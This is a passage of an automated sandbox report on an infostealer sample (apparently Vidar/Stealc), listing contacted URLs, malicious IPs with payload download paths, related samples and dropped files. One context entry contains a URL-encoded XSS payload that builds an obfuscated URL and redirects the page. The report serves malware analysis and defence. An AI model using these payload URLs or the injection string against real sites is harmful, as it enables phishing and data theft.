                                                                                          https://store.steampowered.com/news/aspnet_regiis.exe, 00000003.00000003.2437164159.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2423595894.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2390187972.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2379758595.0000000002F0C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450997934.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                                                          • URL Reputation: safe
                                                                                          		unknown
                                                                                          https://community.akamai.steamstatic.com/aspnet_regiis.exe, 00000003.00000003.2379882274.0000000002F1A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          		unknown
                                                                                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=aspnet_regiis.exe, 00000003.00000003.2518193807.0000000002FF0000.00000004.00000020.00020000.00000000.sdmp, AEHIEC.3.drfalse
                                                                                          • URL Reputation: safe
                                                                                          		unknown
                                                                                          http://store.steampowered.com/subscriber_agreement/aspnet_regiis.exe, 00000003.00000003.2437164159.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2423595894.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2390187972.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450997934.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                                                          • URL Reputation: safe
                                                                                          		unknown
                                                                                          https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgaspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                                                            		unknown
                                                                                            http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#file.exefalse
                                                                                              		unknown
                                                                                              https://49.12.197.9/ta_aspnet_regiis.exe, 00000003.00000003.2551866824.0000000002FCA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2531063121.0000000002FC8000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2531200082.0000000002FC8000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2552104123.0000000002FCA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2531268467.0000000002FC8000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2530342786.0000000002FC8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		unknown
                                                                                                https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                                                                • URL Reputation: safe
                                                                                                		unknown
                                                                                                https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpgaspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F80000.00000004.00000020.00020000.00000000.sdmp, ECBGCB.3.drfalse
                                                                                                  		unknown
                                                                                                  https://recaptcha.net/recaptcha/;aspnet_regiis.exe, 00000003.00000003.2379882274.0000000002F1A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  		unknown
                                                                                                  https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=enaspnet_regiis.exe, 00000003.00000003.2437164159.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2423595894.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2390187972.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450997934.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                                                                  • URL Reputation: safe
                                                                                                  		unknown
                                                                                                  https://steamcommunity.com/profiles/76561199780418869/inventory/aspnet_regiis.exe, 00000003.00000003.2437164159.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2423595894.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2390187972.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450997934.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                                                                    		unknown
                                                                                                    https://steamcommunity.com/discussions/aspnet_regiis.exe, 00000003.00000003.2437164159.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2423595894.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2390187972.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2379758595.0000000002F0C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450997934.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                                                                      		unknown

                                                                                                      World Map of Contacted IPs

                                                                                                      • No. of IPs < 25%
                                                                                                      • 25% < No. of IPs < 50%
                                                                                                      • 50% < No. of IPs < 75%
                                                                                                      • 75% < No. of IPs

                                                                                                      Public IPs

                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                      49.12.197.9
                                                                                                      		unknownGermany
                                                                                                      		24940HETZNER-ASDEtrue
                                                                                                      104.102.49.254
                                                                                                      		steamcommunity.comUnited States
                                                                                                      		16625AKAMAI-ASUStrue
                                                                                                      147.45.44.104
                                                                                                      		unknownRussian Federation
                                                                                                      		2895FREE-NET-ASFREEnetEUfalse

                                                                                                      General Information

                                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                                      Analysis ID:1524661
                                                                                                      Start date and time:2024-10-03 03:34:35 +02:00
                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                      Overall analysis duration:0h 8m 13s
                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                      Report type:full
                                                                                                      Cookbook file name:default.jbs
                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                      Number of analysed new started processes analysed:10
                                                                                                      Number of new started drivers analysed:0
                                                                                                      Number of existing processes analysed:0
                                                                                                      Number of existing drivers analysed:0
                                                                                                      Number of injected processes analysed:0
                                                                                                      Technologies:
                                                                                                      • HCA enabled
                                                                                                      • EGA enabled
                                                                                                      • AMSI enabled
                                                                                                      Analysis Mode:default
                                                                                                      Analysis stop reason:Timeout
                                                                                                      Sample name:file.exe
                                                                                                      Detection:MAL
                                                                                                      Classification:mal100.troj.spyw.evad.winEXE@5/24@1/3
                                                                                                      EGA Information:
                                                                                                      • Successful, ratio: 100%
                                                                                                      HCA Information:
                                                                                                      • Successful, ratio: 100%
                                                                                                      • Number of executed functions: 96
                                                                                                      • Number of non-executed functions: 181
                                                                                                      Cookbook Comments:
                                                                                                      • Found application associated with file extension: .exe

                                                                                                      Warnings

                                                                                                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                                      • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                      Simulations

                                                                                                      Behavior and APIs

                                                                                                      TimeTypeDescription
                                                                                                      21:35:58API Interceptor1x Sleep call for process: aspnet_regiis.exe modified

                                                                                                      Joe Sandbox View / Context

                                                                                                      IPs

                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      49.12.197.9file.exeGet hashmaliciousVidarBrowse
                                                                                                        file.exeGet hashmaliciousVidarBrowse
                                                                                                          66fb252fe232b_Patksl.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                            file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                              file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                                file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                                  file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                    file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                      file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                        file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                          104.102.49.254http://gtm-cn-j4g3qqvf603.steamproxy1.com/Get hashmaliciousUnknownBrowse
                                                                                                                          • www.valvesoftware.com/legal.htm
                                                                                                                          147.45.44.104file.exeGet hashmaliciousVidarBrowse
                                                                                                                          • 147.45.44.104/ldms/a43486128347.exe
                                                                                                                          file.exeGet hashmaliciousVidarBrowse
                                                                                                                          • 147.45.44.104/ldms/a43486128347.exe
                                                                                                                          nJohIBtNm5.exeGet hashmaliciousLummaC, Amadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, RedLineBrowse
                                                                                                                          • 147.45.44.104/revada/66fa80c468fe3_Channel2.exe
                                                                                                                          66fb252fe232b_Patksl.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                                          • 147.45.44.104/ldms/66fbfcc9963ca_ldfsna.exe
                                                                                                                          file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                          • 147.45.44.104/ldms/66fbfcc9963ca_ldfsna.exe
                                                                                                                          file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                                          • 147.45.44.104/ldms/66fbfcc9963ca_ldfsna.exe
                                                                                                                          file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                                          • 147.45.44.104/ldms/66fbfcc9963ca_ldfsna.exe
                                                                                                                          file.exeGet hashmaliciousRDPWrap ToolBrowse
                                                                                                                          • 147.45.44.104/prog/66f55533ca7d6_RDPWInst.exe
                                                                                                                          file.exeGet hashmaliciousRDPWrap ToolBrowse
                                                                                                                          • 147.45.44.104/prog/66f55533ca7d6_RDPWInst.exe
                                                                                                                          file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                          • 147.45.44.104/ldms/66fbfcc9963ca_ldfsna.exe

                                                                                                                          Domains

                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                          steamcommunity.comfile.exeGet hashmaliciousVidarBrowse
                                                                                                                          • 104.102.49.254
                                                                                                                          file.exeGet hashmaliciousVidarBrowse
                                                                                                                          • 104.102.49.254
                                                                                                                          tcU5sAPsAc.exeGet hashmaliciousRedLineBrowse
                                                                                                                          • 104.102.49.254
                                                                                                                          Setup.exeGet hashmaliciousLummaC, MicroClipBrowse
                                                                                                                          • 104.102.49.254
                                                                                                                          66fb252fe232b_Patksl.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                                          • 104.102.49.254
                                                                                                                          file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                          • 104.102.49.254
                                                                                                                          kuly.exeGet hashmaliciousLummaCBrowse
                                                                                                                          • 104.102.49.254
                                                                                                                          webNY0O9Sr.exeGet hashmaliciousLummaCBrowse
                                                                                                                          • 104.102.49.254
                                                                                                                          klFMCT64RF.exeGet hashmaliciousLummaCBrowse
                                                                                                                          • 104.102.49.254
                                                                                                                          EKAHephXb2.exeGet hashmaliciousLummaC, Go Injector, LummaC StealerBrowse
                                                                                                                          • 104.102.49.254

                                                                                                                          ASNs

                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                          FREE-NET-ASFREEnetEUfile.exeGet hashmaliciousVidarBrowse
                                                                                                                          • 147.45.44.104
                                                                                                                          file.exeGet hashmaliciousVidarBrowse
                                                                                                                          • 147.45.44.104
                                                                                                                          nJohIBtNm5.exeGet hashmaliciousLummaC, Amadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, RedLineBrowse
                                                                                                                          • 147.45.60.44
                                                                                                                          66fb252fe232b_Patksl.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                                          • 147.45.44.104
                                                                                                                          file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                          • 147.45.44.104
                                                                                                                          file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                                          • 147.45.44.104
                                                                                                                          file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                                          • 147.45.44.104
                                                                                                                          file.exeGet hashmaliciousRDPWrap ToolBrowse
                                                                                                                          • 147.45.44.104
                                                                                                                          file.exeGet hashmaliciousRDPWrap ToolBrowse
                                                                                                                          • 147.45.44.104
                                                                                                                          file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                          • 147.45.44.104
                                                                                                                          AKAMAI-ASUSfile.exeGet hashmaliciousVidarBrowse
                                                                                                                          • 104.102.49.254
                                                                                                                          file.exeGet hashmaliciousVidarBrowse
                                                                                                                          • 104.102.49.254
                                                                                                                          Globalfoundries.com_Report_46279.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                                                          • 23.217.172.185
                                                                                                                          cleu.cmDGet hashmaliciousUnknownBrowse
                                                                                                                          • 23.47.168.24
                                                                                                                          kUiqbpzmbo.exeGet hashmaliciousXWormBrowse
                                                                                                                          • 92.122.18.57
                                                                                                                          Play_VM-NowCWhiteAudiowav012.htmlGet hashmaliciousTycoon2FABrowse
                                                                                                                          • 2.19.224.93
                                                                                                                          tcU5sAPsAc.exeGet hashmaliciousRedLineBrowse
                                                                                                                          • 104.102.49.254
                                                                                                                          deveba=.htmlGet hashmaliciousUnknownBrowse
                                                                                                                          • 173.223.116.167
                                                                                                                          Proposal From Transom.pdfGet hashmaliciousHtmlDropperBrowse
                                                                                                                          • 23.203.104.175
                                                                                                                          Payout_receipt.pdfGet hashmaliciousUnknownBrowse
                                                                                                                          • 96.17.64.189
                                                                                                                          HETZNER-ASDEfile.exeGet hashmaliciousVidarBrowse
                                                                                                                          • 49.12.197.9
                                                                                                                          file.exeGet hashmaliciousVidarBrowse
                                                                                                                          • 49.12.197.9
                                                                                                                          MZs41xJfcH.exeGet hashmaliciousPureLog Stealer, Quasar, zgRATBrowse
                                                                                                                          • 195.201.57.90
                                                                                                                          N5mRSBWm8P.exeGet hashmaliciousQuasarBrowse
                                                                                                                          • 195.201.57.90
                                                                                                                          https://www.florenceco.org/offices/elected/solicitor/docket.php?area=florence%22%3E%3C%69%6D%67%20%73%72%63%3D%22%69%6D%61%67%65%2E%6A%70%67%22%20%6F%6E%65%72%72%6F%72%3D%22%76%61%72%20%75%72%6C%31%20%3D%20%5B%27%68%74%74%27%2C%27%70%3A%2F%2F%67%27%2C%27%6F%27%2C%27%6F%67%27%2C%27%6C%65%2E%63%27%2C%27%6F%6D%27%2C%27%2F%27%2C%27%23%27%2C%27%66%27%5D%2E%6A%6F%69%6E%28%27%27%29%3B%20%76%61%72%20%75%72%6C%32%20%3D%20%5B%27%68%74%74%27%2C%27%70%3A%2F%2F%67%27%2C%27%6F%27%2C%27%6F%67%27%2C%27%6C%65%2E%63%27%2C%27%6F%6D%27%2C%27%2F%27%2C%27%23%27%2C%27%66%27%5D%2E%6A%6F%69%6E%28%27%27%29%3B%0D%0A%76%61%72%20%75%72%6C%20%3D%20%5B%27%68%74%27%2C%27%74%70%27%2C%27%73%3A%2F%2F%76%27%2C%27%61%75%6C%27%2C%27%74%64%6F%27%2C%27%72%65%73%2E%63%27%2C%27%6F%6D%2F%30%2F%27%2C%27%30%2F%30%2F%27%2C%27%34%33%66%66%27%2C%27%35%63%62%35%27%2C%27%63%36%27%2C%27%32%65%27%2C%27%32%66%38%64%31%27%2C%27%31%63%61%33%38%38%27%2C%27%65%34%37%35%62%36%27%2C%27%63%34%36%2F14/392-16513/1254-3178-27524%27%5D%2E%6A%6F%69%6E%28%27%27%29%3B%0D%0A%20%75%72%6C%20%3D%20%75%72%6C%2E%72%65%70%6C%61%63%65%28%2F%2C%2F%67%2C%20%27%27%29%3B%20%76%61%72%20%77%69%6E%20%3D%20%77%69%6E%64%6F%77%2E%6F%70%65%6E%28%75%72%6C%2C%20%27%5F%73%65%6C%66%27%29%3B%20%77%69%6E%2E%6F%70%65%6E%65%72%20%3D%20%6E%75%6C%6C%3B%20%77%69%6E%2E%6C%6F%63%61%74%69%6F%6E%2E%72%65%70%6C%61%63%65%28%75%72%6C%29%3B%22%3EGet hashmaliciousPhisherBrowse
                                                                                                                          • 5.161.250.225
                                                                                                                          mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                          • 197.242.86.248
                                                                                                                          ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                                          • 197.242.86.252
                                                                                                                          novo.mpsl.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                          • 5.75.175.36
                                                                                                                          novo.x86.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                          • 116.203.33.160
                                                                                                                          yakov.spc.elfGet hashmaliciousMiraiBrowse
                                                                                                                          • 78.47.94.116

                                                                                                                          JA3 Fingerprints

                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                          51c64c77e60f3980eea90869b68c58a8file.exeGet hashmaliciousVidarBrowse
                                                                                                                          • 49.12.197.9
                                                                                                                          file.exeGet hashmaliciousVidarBrowse
                                                                                                                          • 49.12.197.9
                                                                                                                          66fb252fe232b_Patksl.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                                          • 49.12.197.9
                                                                                                                          file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                          • 49.12.197.9
                                                                                                                          file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                                          • 49.12.197.9
                                                                                                                          file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                                          • 49.12.197.9
                                                                                                                          file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                          • 49.12.197.9
                                                                                                                          file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                          • 49.12.197.9
                                                                                                                          file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                          • 49.12.197.9
                                                                                                                          file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                          • 49.12.197.9
                                                                                                                          37f463bf4616ecd445d4a1937da06e19file.exeGet hashmaliciousVidarBrowse
                                                                                                                          • 104.102.49.254
                                                                                                                          file.exeGet hashmaliciousVidarBrowse
                                                                                                                          • 104.102.49.254
                                                                                                                          MZs41xJfcH.exeGet hashmaliciousPureLog Stealer, Quasar, zgRATBrowse
                                                                                                                          • 104.102.49.254
                                                                                                                          C5Nbn7P6GJ.exeGet hashmaliciousXRed, XWormBrowse
                                                                                                                          • 104.102.49.254
                                                                                                                          66fb252fe232b_Patksl.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                                          • 104.102.49.254
                                                                                                                          file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                          • 104.102.49.254
                                                                                                                          lFsYXvJPWw.exeGet hashmaliciousXRedBrowse
                                                                                                                          • 104.102.49.254
                                                                                                                          file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                                          • 104.102.49.254
                                                                                                                          563299efce875400a8d9b44b96597c8e-sample (1).zipGet hashmaliciousUnknownBrowse
                                                                                                                          • 104.102.49.254
                                                                                                                          file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                                          • 104.102.49.254

                                                                                                                          Dropped Files

                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                          C:\ProgramData\freebl3.dllfile.exeGet hashmaliciousVidarBrowse
                                                                                                                            file.exeGet hashmaliciousVidarBrowse
                                                                                                                              file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                  nJohIBtNm5.exeGet hashmaliciousLummaC, Amadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, RedLineBrowse
                                                                                                                                    file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                      file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                        66fb252fe232b_Patksl.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                                                          file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                            file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                              C:\ProgramData\mozglue.dllfile.exeGet hashmaliciousVidarBrowse
                                                                                                                                                file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                  file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                    file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                      nJohIBtNm5.exeGet hashmaliciousLummaC, Amadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, RedLineBrowse
                                                                                                                                                        file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                          file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                            66fb252fe232b_Patksl.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                                                                              file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                file.exeGet hashmaliciousStealc, VidarBrowse

                                                                                                                                                                  Created / dropped Files

                                                                                                                                                                  C:\ProgramData\BGCAAFHIEBKJ\AEHIEC

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):106496
                                                                                                                                                                  Entropy (8bit):1.136471148832945
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                                                                                                  MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                                                                                                  SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                                                                                                  SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                                                                                                  SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\ProgramData\BGCAAFHIEBKJ\AFHDHC

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):159744
                                                                                                                                                                  Entropy (8bit):0.5394293526345721
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                                                                                                                                  MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                                                                                                                                  SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                                                                                                                                  SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                                                                                                                                  SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Reputation:high, very likely benign file
                                                                                                                                                                  Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\ProgramData\BGCAAFHIEBKJ\DHCAAE

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                  Entropy (8bit):0.8508558324143882
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
